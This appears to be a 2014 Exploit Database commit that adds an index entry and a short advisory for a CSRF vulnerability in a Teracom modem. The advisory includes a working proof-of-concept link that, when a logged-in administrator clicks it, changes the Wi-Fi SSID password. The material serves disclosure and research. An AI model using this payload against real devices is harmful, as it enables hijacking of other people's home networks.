Updated 04_21_2014
This commit is contained in:
Offensive Security
parent
0181f4682f
commit
60422ba127
2 changed files with 13 additions and 0 deletions
|
|
@ -29691,3 +29691,4 @@ id,file,description,date,author,platform,type,port
|
|||
32940,platforms/java/webapps/32940.txt,"Sun Java System Delegated Administrator 6.x HTTP Response Splitting Vulnerability",2009-04-21,"SCS team",java,webapps,0
|
||||
32941,platforms/php/webapps/32941.txt,"PTCeffect 4.6 - LFI & SQL Injection Vulnerabilities",2014-04-19,"walid naceri",php,webapps,0
|
||||
32942,platforms/linux/remote/32942.txt,"Mozilla Multiple Products Server Refresh Header XSS",2009-04-22,"Olli Pettay",linux,remote,0
|
||||
32943,platforms/hardware/webapps/32943.txt,"Teracom Modem T2-B-Gawv1.4U10Y-BI - CSRF Vulnerability",2014-04-20,"Rakesh S",hardware,webapps,0
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
12
platforms/hardware/webapps/32943.txt
Executable file
12
platforms/hardware/webapps/32943.txt
Executable file
|
|
@ -0,0 +1,12 @@
|
|||
# Exploit Title: Teracom Modem CSRF Vulnerability
|
||||
# Date: 20-04-2014
|
||||
# Author: Rakesh S
|
||||
# Software Link: http://www.teracom.in/
|
||||
# Version: T2-B-Gawv1.4U10Y-BI
|
||||
|
||||
The vulnerability exists due to insufficient validation of HTTP request origin. A remote attacker can trick a logged-in administrator to visit a specially crafted webpage to change SSID and its password.
|
||||
|
||||
The exploitation example below changes password for the SSID:
|
||||
|
||||
|
||||
<a href="http://[HOST]/webconfig/wlan/country.html/country?context=&wlanprofile=MIXED_G_WIFI&wlanstatus=on&country=INI&txpower=1&wlanmultitouni=on&TxRate=Automatic&chanselect=automatic&channel=8&essid=SSID&hidessid=off&security=wpa2&encryptionselect=tkip&authmethodselect=psk&wpapp=ChangePassword&pmkcaching=on&confirm=Confirm" target="myIframe">Submit</a>
|
||||
Loading…
Add table
Reference in a new issue